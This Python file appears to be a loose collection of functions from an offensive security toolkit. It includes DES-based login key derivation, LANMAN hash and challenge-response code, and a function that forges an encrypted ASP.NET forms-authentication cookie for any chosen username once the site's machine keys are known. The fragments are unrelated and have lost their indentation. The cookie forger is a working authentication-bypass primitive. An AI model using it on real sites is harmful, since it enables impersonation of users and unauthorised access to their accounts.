def getSecretKey(self, uname, pwd):
ret = 0
#manip = manipulated uname & pwd
manip = self.manip(uname, pwd)
l = len(manip)
#print "manip: [%s] %s"%(manip,hexprint(manip))
deskey1 = binstring("0123456789ABCDEF")
#init
d = DES.DES(deskey1, DES.DES_CBC_MODE, IV="\0\0\0\0\0\0\0\0")
enc = d.encrypt(manip)
#print "enc2: %s"%hexprint(enc2)
#use last 8 bytes from first encrypt as key
value1 = enc[l - 8:]
#print "value1: %s"%hexprint(value1)
#reset key to be value1
d = DES.DES(value1, DES.DES_CBC_MODE, IV="\0\0\0\0\0\0\0\0")
enc = d.encrypt(manip)
#print "enc2: %s"%hexprint(enc2)
value2 = enc[l - 8:]
#print "value2: %s"%hexprint(value2)
ret = value2
#print "getsecretkey returning: %s"%ret
return ret
def getEncPassword(self, password, key):
password = self.padStr(password)
d = DES.DES(key, DES.DES_CBC_MODE, IV="\0\0\0\0\0\0\0\0")
encpwd = d.encrypt(password)
#print "encpwd: %s"%hexprint(encpwd)
return encpwd
def calculate_lanman_response(key, challenge):
"""
key has been generated with get_lanman_hash
challege is from remote server
we return a 24 byte string (the response)
"""
#three seven byte keys
key1 = key[:7]
key2 = key[7:14]
key3 = key[14:]
if len(key3) < 7:
key3 = key3 + "\x00" * (7 - len(key3))
#print "Key3: %s"%prettyhexprint(key3)
resp1 = DES.DES(key1).encrypt(challenge)
resp2 = DES.DES(key2).encrypt(challenge)
resp3 = DES.DES(key3).encrypt(challenge)
return resp1 + resp2 + resp3
def get_lanman_hash(password):
"""
gets a lanman hash given a password
"""
if password == None:
password = ""
constant = "KGS!@#$%"
password = password.upper()
password = stroverwrite("\x00" * 14, password, 0)[:14]
d = DES.DES(password[:7])
first = d.encrypt(constant)
d = DES.DES(password[7:])
last = d.encrypt(constant)
total = first + last
#pad out to 21 bytes
total = total + "\x00" * (21 - len(total))
return total
def forgeDotNetCookie(encryptionkey, validationkey, username, apppath):
cookie = ""
# Genero los primeros 8 bytes random
for i in range(8):
cookie += chr(random.randint(0, 255))
#Ticket version
cookie += "\x02"
# username
cookie += username.encode("utf-16-le")
# End delimiter
cookie += "\x00\x00"
# issue date, we use "now" minus 10hours, just in case
cookie += struct.pack("<Q", (time.time() - 10 * 60 * 60) * 10**8)
# Ticket persistent
cookie += "\x00"
# Expiration date, we use "now" plus 100 days :)
cookie += struct.pack("<Q", (time.time() + 24 * 60 * 60 * 100) * 10**8)
#User data, we are not using it now
cookie += ""
# End delimiter
cookie += "\x00\x00"
# App path
cookie += apppath.encode("utf-16-le")
# End cookie delimiter
cookie += "\x00\x00"
# HMAC it!
cookie += HMAC.new(validationkey.decode("hex"), cookie, SHA).digest()
#Pad it
devlog('dotnetcookie', "len del cookie: %d" % len(cookie))
if len(cookie) % 8 == 0:
cookie += "\x08" * 8
else:
devlog(
'dotnetcookie', '%s' % (chr(8 - len(cookie) % 8) *
(8 - len(cookie) % 8)).encode("hex"))
cookie += chr(8 - len(cookie) % 8) * (8 - len(cookie) % 8)
devlog('dotnetcookie', "len del cookie: %d" % len(cookie))
# Now we encrypt it :)
obj = DES.triple_des(encryptionkey.decode("hex"), DES.CBC, '\0' * 8)
return obj.encrypt(cookie).encode("hex")
def getPasswordKey(self, data, key):
ret = ""
#data is recvd from server, key was derived from uname/pwd manipulation
data = binstring(data)
d = DES.DES(key, DES.DES_CBC_MODE, IV="\0\0\0\0\0\0\0\0")
dec = d.decrypt(data)
#print "dec: %s"%hexprint(dec)
l = len(data)
dec = dec[l - 8:]
return dec
def _encrypt(self, data):
obj = DES.triple_des(self.encryptionkey.decode("hex"), DES.CBC, self.iv)
return obj.encrypt(data)
def set_des(self, key, desMode=DES.DES_CBC_MODE):
self.__mss_doDes = 1
self.__mss_desKey = key
self.__mss_DESENCRYPT = DES.DES(self.__mss_desKey, mode=desMode)
self.__mss_DESDECRYPT = DES.DES(self.__mss_desKey, mode=desMode)